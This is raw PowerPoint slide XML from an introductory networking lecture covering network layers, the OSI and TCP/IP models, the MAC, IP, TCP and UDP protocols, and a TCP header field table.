                <a:gridCol w="1015784">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3096376603"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015784">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="862421901"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015784">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3232281122"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015784">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="43593071"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015784">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="990760732"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1015784">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2729142630"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="995453">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="4400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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4400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>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2960973"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arrow: Down 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88F5FB6B-DED0-46E9-B844-641105503C51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5807942" y="3838434"/>
            <a:ext cx="552659" cy="557466"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BE5812"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="333F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BE2A77FC-45CC-4E4F-ABFF-F949F415E591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5807942" y="5198566"/>
            <a:ext cx="552659" cy="557466"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="BE5812"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="333F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4051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Networking Layers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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While networking is often discussed in terms of topology in a horizontal way, between hosts, its implementation is conceptually layered in a vertical fashion throughout a computer or network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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There are multiple technologies and protocols that are built on top of each other in order for communication to function more easily. Each successive, higher layer abstracts the raw data a little bit more, and makes it simpler to use for applications and users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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It also allows you to leverage lower layers in new ways without having to invest the time and energy to develop the protocols and applications that handle those types of traffic.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2674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Networking Layers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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The language that we use to talk about each of the layering scheme varies significantly depending on which model you use. Regardless of the model used to discuss the layers, the path of data is the same.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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As data is sent out of one machine, it begins at the top of the stack and filters downwards.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the lowest level, actual transmission to another machine takes place.</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this point, the data travels back up through the layers of the other computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="ct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Each layer has the ability to add its own "wrapper" around the data that it receives from the adjacent layer, which will help the layers that come after decide what to do with the data when it is passed off.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154619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OSI Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="98568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One method of talking about the different layers of network communication is the Open Systems Interconnect (OSI) model.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092272D5-2F65-452D-AD0D-668CEB1744A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="250"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1927884"/>
            <a:ext cx="6678839" cy="4574720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212680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TCP/IP Model</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="98568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TCP/IP model, more commonly known as the Internet protocol suite, is another layering model that is simpler and has been widely adopted. It defines the four separate layers, some of which overlap with the OSI model.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14338" name="Picture 2" descr="http://mhshohag.com/wp-content/uploads/2018/09/Screen-Shot-2017-06-08-at-1.59.05-PM.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{387D7F95-D7BA-4121-A6EF-7D9ABE569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704" y="2210052"/>
            <a:ext cx="5538258" cy="45082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4542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Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4093428"/>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Media Access Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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Media Access Control is a communications protocol that is used to distinguish specific devices. Each device is supposed to get a unique MAC address during the manufacturing process that differentiates it from every other device on the internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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Addressing hardware by the MAC address allows you to reference a device by a unique value even when the software on top may change the name for that specific device during operation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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Media Access Control is one of the only protocols from the link layer that you are likely to interact with on a regular basis.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183548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Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5324535"/>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Internet Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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Internet Protocol is one of the fundamental protocols that allow the internet to work. IP addresses are unique on each network and they allow machines to address each other across a network. It is implemented on the internet layer in the TCP/IP model.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000"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Networks can be linked together, but traffic must be routed when crossing network boundaries. This protocol assumes an unreliable network and multiple paths to the same destination that it can dynamically change between.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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There are a number of different implementations of the protocol. The most common implementation today is IPv4.</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IPv6 is growing in popularity as an alternative due to the scarcity of IPv4 addresses available and improvements in the protocols capabilities.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 2015, the US ran out of IPv4 addresses. IPv6 allows for 340 undecillion possible addresses – That’s 1x10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="30000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>36</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>! Surely that will be enough, right?)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC2CEB74-A61E-497B-A134-B6EDD5EB4FDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11624216" y="6272508"/>
            <a:ext cx="567784" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>5×10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" baseline="30000" dirty="0"/>
              <a:t>28</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4431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Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Transmission Control Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" b="1"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TCP is implemented in the transport layer of the TCP/IP model and is used to establish reliable connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="ct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TCP is one of the protocols that encapsulates data into packets. It then transfers these to the remote end of the connection using the methods available on the lower layers. On the other end, it can check for errors, request certain pieces to be resent, and reassemble the information into one logical piece to send to the application layer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="ct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The protocol builds up a connection prior to data transfer using a system called a three-way handshake. This is a way for the two ends of the communication to acknowledge the request and agree upon a method of ensuring data reliability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US"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TCP is the protocol of choice for many of the most popular uses for the internet, including WWW, FTP, SSH, and email. It is safe to say that the internet we know today would not be here without TCP. (The web is not the internet)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3940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Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>User Datagram Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" b="1"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It is a popular companion protocol to TCP and is also implemented in the transport layer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="ct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The fundamental difference between UDP and TCP is that UDP offers unreliable data transfer. It does not verify that data has been received on the other end of the connection. This might sound like a bad thing, and for many purposes, it is. However, it is also extremely important for some functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="ct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Because it is not required to wait for confirmation that the data was received and forced to resend data, UDP is much faster than TCP. It does not establish a connection with the remote host, it simply fires off the data to that host and doesn't care if it is accepted or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" fontAlgn="ct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Because it is a simple transaction, it is useful for simple communications like querying for network resources. It also doesn't maintain a state, which makes it great for transmitting data from one machine to many real-time clients. This makes it ideal for VOIP, games, and other applications that cannot afford delays.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="412544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0B97BDF-A7DE-4917-9AEA-87329B90CE4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="960885792"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2225749" y="2835349"/>
          <a:ext cx="8077200" cy="2595880"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1346200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1585503923"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1346200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2685295074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1346200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1517704111"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1346200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="340107163"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2692400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4206349206"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Source</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Destination</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2142271566"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc gridSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Sequence Number</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">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0169478"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc gridSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Acknowledgement Number</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">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847208"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Data Offset</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Reserved</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Code</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Window</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2155529114"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Checksum</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Urgent</a:t>
                      </a:r>
                    </a:p>
